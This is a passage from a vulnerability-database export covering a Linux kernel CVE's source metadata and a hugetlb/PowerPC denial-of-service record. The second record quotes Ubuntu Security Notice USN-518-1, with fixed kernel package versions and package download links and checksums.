        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "date": "2010-01-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "date": "2010-01-12T00:00:00",
        "db": "BID",
        "id": "37724"
      },
      {
        "date": "2010-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "date": "2011-02-11T13:13:00",
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "date": "2010-03-01T21:20:35",
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "date": "2010-02-05T16:17:54",
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "date": "2010-02-15T20:31:13",
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "date": "2010-01-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "date": "2010-01-26T18:30:01.010000",
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "date": "2015-05-07T17:12:00",
        "db": "BID",
        "id": "37724"
      },
      {
        "date": "2011-03-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "date": "2023-02-13T02:20:56.690000",
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  print_fatal_signal Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      }
    ],
    "trust": 0.6
  }
}

var-200709-0497
Vulnerability from variot

mm/mmap.c in the hugetlb kernel, when run on PowerPC systems, does not prevent stack expansion from entering into reserved kernel page memory, which allows local users to cause a denial of service (OOPS) via unspecified vectors. (DoS) Vulnerabilities exist.Denial of service to malicious local users (DoS) There is a possibility of being put into a state. =========================================================== Ubuntu Security Notice USN-518-1 September 25, 2007 linux-source-2.6.15/17/20 vulnerabilities CVE-2007-3731, CVE-2007-3739, CVE-2007-3740, CVE-2007-4573 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-29-386 2.6.15-29.60 linux-image-2.6.15-29-686 2.6.15-29.60 linux-image-2.6.15-29-amd64-generic 2.6.15-29.60 linux-image-2.6.15-29-amd64-k8 2.6.15-29.60 linux-image-2.6.15-29-amd64-server 2.6.15-29.60 linux-image-2.6.15-29-amd64-xeon 2.6.15-29.60 linux-image-2.6.15-29-hppa32 2.6.15-29.60 linux-image-2.6.15-29-hppa32-smp 2.6.15-29.60 linux-image-2.6.15-29-hppa64 2.6.15-29.60 linux-image-2.6.15-29-hppa64-smp 2.6.15-29.60 linux-image-2.6.15-29-itanium 2.6.15-29.60 linux-image-2.6.15-29-itanium-smp 2.6.15-29.60 linux-image-2.6.15-29-k7 2.6.15-29.60 linux-image-2.6.15-29-mckinley 2.6.15-29.60 linux-image-2.6.15-29-mckinley-smp 2.6.15-29.60 linux-image-2.6.15-29-powerpc 2.6.15-29.60 linux-image-2.6.15-29-powerpc-smp 2.6.15-29.60 linux-image-2.6.15-29-powerpc64-smp 2.6.15-29.60 linux-image-2.6.15-29-server 2.6.15-29.60 linux-image-2.6.15-29-server-bigiron 2.6.15-29.60 linux-image-2.6.15-29-sparc64 2.6.15-29.60 linux-image-2.6.15-29-sparc64-smp 2.6.15-29.60

Ubuntu 6.10: linux-image-2.6.17-12-386 2.6.17.1-12.41 linux-image-2.6.17-12-generic 2.6.17.1-12.41 linux-image-2.6.17-12-hppa32 2.6.17.1-12.41 linux-image-2.6.17-12-hppa64 2.6.17.1-12.41 linux-image-2.6.17-12-itanium 2.6.17.1-12.41 linux-image-2.6.17-12-mckinley 2.6.17.1-12.41 linux-image-2.6.17-12-powerpc 2.6.17.1-12.41 linux-image-2.6.17-12-powerpc-smp 2.6.17.1-12.41 linux-image-2.6.17-12-powerpc64-smp 2.6.17.1-12.41 linux-image-2.6.17-12-server 2.6.17.1-12.41 linux-image-2.6.17-12-server-bigiron 2.6.17.1-12.41 linux-image-2.6.17-12-sparc64 2.6.17.1-12.41 linux-image-2.6.17-12-sparc64-smp 2.6.17.1-12.41

Ubuntu 7.04: linux-image-2.6.20-16-386 2.6.20-16.32 linux-image-2.6.20-16-generic 2.6.20-16.32 linux-image-2.6.20-16-hppa32 2.6.20-16.32 linux-image-2.6.20-16-hppa64 2.6.20-16.32 linux-image-2.6.20-16-itanium 2.6.20-16.32 linux-image-2.6.20-16-lowlatency 2.6.20-16.32 linux-image-2.6.20-16-mckinley 2.6.20-16.32 linux-image-2.6.20-16-powerpc 2.6.20-16.32 linux-image-2.6.20-16-powerpc-smp 2.6.20-16.32 linux-image-2.6.20-16-powerpc64-smp 2.6.20-16.32 linux-image-2.6.20-16-server 2.6.20-16.32 linux-image-2.6.20-16-server-bigiron 2.6.20-16.32 linux-image-2.6.20-16-sparc64 2.6.20-16.32 linux-image-2.6.20-16-sparc64-smp 2.6.20-16.32

After a standard system upgrade you need to reboot your computer to affect the necessary changes.

Details follow:

Evan Teran discovered that the Linux kernel ptrace routines did not correctly handle certain requests robustly. (CVE-2007-4573)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.diff.gz
  Size/MD5:  2861572 992314f317fb2564845d961f10eb669c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60.dsc
  Size/MD5:     2374 ea98a1231d5e3b39ee323094330779ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-29.60_all.deb
  Size/MD5:  5164002 1d798798df2b0e7be8312a541a84351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-29.60_all.deb
  Size/MD5:    91812 8b49eb63250c21295b63d97e48caaf2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-29.60_all.deb
  Size/MD5: 44728890 8c42dde4ed9a757ab7b6a92835fd95ea

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    22350 4c3cb3df749dbfe529727df7a7d3a1a6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    44768 918f818f4f2c18342cdb370f69c75b6f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:     2308 364b72a63d4437fb444606fa10a36e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    36248 c9a3bcd22da9b74f7d82772a2131582a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   102288 3fac5df61abc13bee3d1f02b288ef717
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    38880 4e1a5a061eee39d7f868ca3fc7405fdd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    49132 747ee42e436d90f369c78ade768b0fb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   176700 16c192c3c5dc7e76d66c54198809fdc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    36770 802fa7986361535ac23f3cd5706548f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   142250 d0a8a7527b160352ccec7e0d45e295a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    51040 324c0b5e5173e97d714c4d525dcbc561
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   140600 e1a6c9cf002775ccc1435ebab3bc410e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   286888 a20b6008a0282e0f29a766b1f096923b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    97796 e5c9a1543b6fdfa84dc59f4e7546fa2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:  1650780 08c9d7b3a8e578dd9683b965b41387c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-generic_2.6.15-29.60_amd64.deb
  Size/MD5:   869484 a2bae2aa842f48fe46ea23a75e32f798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb
  Size/MD5:   868860 1eddb75fceb142d9d189bb07a8fa3508
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-server_2.6.15-29.60_amd64.deb
  Size/MD5:   869542 90ac3aa178a08a7e25a3c986437f61c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb
  Size/MD5:   865334 86b00982764739314edfa7eda97e3ea9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_amd64.deb
  Size/MD5:  6915922 ace2f4f390f45a8baf8948ce92b1185f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-generic_2.6.15-29.60_amd64.deb
  Size/MD5: 20804078 9c8596f2bf11553c3b89541f2e6b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-k8_2.6.15-29.60_amd64.deb
  Size/MD5: 20778400 b80de9fda371f41b8f3f898f677c81cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-server_2.6.15-29.60_amd64.deb
  Size/MD5: 21624500 d8f93fd23fc44555b4e9b3f6bf2661d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-amd64-xeon_2.6.15-29.60_amd64.deb
  Size/MD5: 19890352 fdff7a7f1be434702a034b517da1436c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    15628 29ac5d64ab3f967bb59ba715b5217b9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   240272 650e63fca69efad6ca39ea689ec46683
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   202548 5bc5a643e51c26fff8a407d2ce90d4e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:  1048608 1b72fc6272a7c22f40c4009a5a2b5c1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:  1486560 3d0039e5b8ad2a73e494b9d5ce71780f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   161642 a724a1c820f4524a9a75e99db316d08d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:     9828 9f09f7b5b89fa050b4e08923b4515ac7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    80852 e41dc1bc6ea76debb02a76ed29ed1260
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    49164 06c6574e233bb526d98d25c2a1404994
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    35160 39674f9a3de32fe1a779a5f4b2f977ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    70860 588508535ff2a1b31f2fe05bea3db6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:     6216 5ffc9686a097131b5980cdb2549d1f12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:     9058 8e2fafc78b8c330ae43f3de8567a5ff5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    57878 44329e40c195ee0f42994dc760bb5fcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   123328 91f9a4fda1e0d76ae32c9beaf101131d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   100880 bc3d8f4bf7a77a6462385966b437882d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    79234 2bc08545229d05e5b9bedd639778bb5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:  1594714 92331ca83235f62cdac8161c11b26b08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    72288 ef1c4009f30bc3c15e95fe0146784448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    12650 d35a35d8e20e7e098348b42396f3de99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    33734 af7a8f60c54ebd068b7d0cc18d789560
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   138182 f80598f18000bb150dfb91e8097faa0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:    38932 914391dd36d1d70d4614109f56c44a8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-amd64-generic-di_2.6.15-29.60_amd64.udeb
  Size/MD5:   278738 97e0dbb44ee9cc421d52d69abd938fcc

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    18968 95109c7a00d02bde41e710a650daaf9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    43450 ff94d128c899ce965bb2ea6e322ecf08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   105200 a8287e00a0c05a5538cc0391906d67e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:     2280 70c978111851b479b4bd56464a2fba38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    34574 fa902e8d71e612c1d5c781b838bab9ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    96958 95d49cdc14c8660432c91a3bc09bf57c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    37080 9bc7b95ad65241141d56b4d159faa63e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    44072 5ca25f1bdf2da3e4c7f5a156372b6713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   167746 b1b6a9274da69f85e90e11d6c476487b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    33928 b87d0fd21930fc1ba059662465374fc8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   137838 2c5b08b39b63e2a6406b8e1db065f8a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    46874 43ebdaadfd384f8b15f83fd671715013
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   132964 ac79d6762da890f46a137247e9a4997d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   273460 963d1bd9e3b2cd65c5f3c67cd2c99b2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   102250 fdcf2a1f6ef8c580b8ee0f39d92ae61a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:  1595586 7c78c5e600f497a1296e6f4d687db80a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-386_2.6.15-29.60_i386.deb
  Size/MD5:   855294 c8226f61389965def3dd751b325c9d50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-686_2.6.15-29.60_i386.deb
  Size/MD5:   856320 fa0a447cadfade07a6dd38ac9b77fc9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-k7_2.6.15-29.60_i386.deb
  Size/MD5:   858182 3eeaf1b4aa7a0ef04e42644440fb5a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb
  Size/MD5:   861924 9958b24ec91fc7b2d80b1f388be251c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-server_2.6.15-29.60_i386.deb
  Size/MD5:   856724 5cac6b200e21c35b68873335a55e1969
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_i386.deb
  Size/MD5:  6908102 291aa054ab7051af6f75cbcecd1b64fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-386_2.6.15-29.60_i386.deb
  Size/MD5: 21706576 6f159fb44cda586afee845a2c495faf8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-686_2.6.15-29.60_i386.deb
  Size/MD5: 22502914 9346112c1b848b7b252cf857e98aba8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-k7_2.6.15-29.60_i386.deb
  Size/MD5: 22244476 d7ee303955b1be0d900127c8ee0d6de5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server-bigiron_2.6.15-29.60_i386.deb
  Size/MD5: 23605582 de50ae9143cc6a7d8ce26b22eaa1bcd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-server_2.6.15-29.60_i386.deb
  Size/MD5: 23167510 71224f4c66f5355abfa3c0f1a0b54f23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    15498 890b3d262306cea9380241dde14fd78f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   238438 c71260c4fd965d33f190f2531d487a72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   196968 252485c4aca1c2a775e41fdc7dc84c62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:  1048380 21d1f3891bff98f3113ad95e5eecf8eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:  1684992 a257e4ca24202bb249aad71c072a3d47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   160816 6395c6d97d5d5eee151734c297eed382
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:     9162 0d4937205b319d90d127f8c178ab3494
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    76476 4ddd26af38b390ef5facdd96caf7f77b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    53252 ac1c736ee2220b2eb556c14040dbc338
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    33058 ba263a1da07ca910a0b615a0afb1b5f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    85630 3a74d92d184a81b2e7dcff96a3458676
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:     6026 d83e2390601f1edfa5a03423fb4b3dd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:     8754 45f769ff783acfb2a996ee2e707d547e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    53594 477d3562d0a9de84191a7be0999c6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:   130774 5f6a2d635f1ff032c401f454c1a0496c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    98412 9cc716b9dab804837cc53130008fc5ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    77174 502e6544805144ed5d9df0ac24592771
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:  1768404 74797234b6c3315013bd9896eaf3be15
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    69564 b80322f8074fc6040fcff28a4d75aca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb
  Size/MD5:    11760 e1baffd19bb6ab5d05dbe2feb9f51f3d
